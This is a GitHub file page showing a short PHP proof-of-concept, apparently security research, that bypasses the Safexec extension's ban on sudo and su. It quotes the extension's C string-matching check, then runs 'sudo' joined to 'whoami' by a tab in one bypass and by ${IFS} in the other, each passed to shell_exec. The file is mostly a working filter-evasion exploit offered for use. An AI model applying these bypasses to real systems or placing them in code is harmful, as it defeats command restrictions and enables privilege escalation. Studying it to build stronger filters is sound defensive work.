-
-
Notifications
You must be signed in to change notification settings - Fork 25
/
Copy pathsafexec-bypass.php
41 lines (35 loc) · 1.01 KB
/
safexec-bypass.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
<?php
/* Safexec PHP extension bypass
* By @Wireghoul - justanotherhacker.com
*
* Safexec - https://github.com/ilk33r/safexec
* ----------------
* String matches for presence of sudo or su to prevent their use.
* https://github.com/ilk33r/safexec/blob/master/safeexec.c#L120
*
```
if(SAFEEXEC_G(dissallow_sudo_command))
{
char *searchSudoWord;
searchSudoWord = strstr(cmd, "sudo ");
if (searchSudoWord != NULL)
{
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Cannot execute %s command. Sudo command is not allowed with safeexec extension", cmd);
return '0';
}
searchSudoWord = strstr(cmd, "su ");
if (searchSudoWord != NULL)
{
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Cannot execute %s command. Su command is not allowed with safeexec extension", cmd);
return '0';
}
}
```
*/
//Bypass1
$cmd="sudo\twhoami";
shell_exec($cmd);
//Bypass2
$cmd="sudo\${IFS}whoami";
shell_exec($cmd);
?>